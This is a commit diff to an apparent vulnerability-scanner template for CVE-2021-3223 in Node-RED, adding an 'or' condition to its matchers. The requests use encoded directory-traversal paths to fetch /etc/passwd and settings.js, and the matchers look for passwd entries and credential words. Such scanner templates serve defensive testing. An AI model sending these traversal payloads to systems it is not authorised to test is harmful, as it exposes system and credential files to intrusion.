Update CVE-2021-3223.yaml
parent
ae672521d9
commit
5c22441bac
|
@ -16,13 +16,14 @@ requests:
|
|||
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
|
||||
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "username"
|
||||
- "password"
|
||||
- "Node-RED web server is listening"
|
||||
|
|
Loading…
Reference in New Issue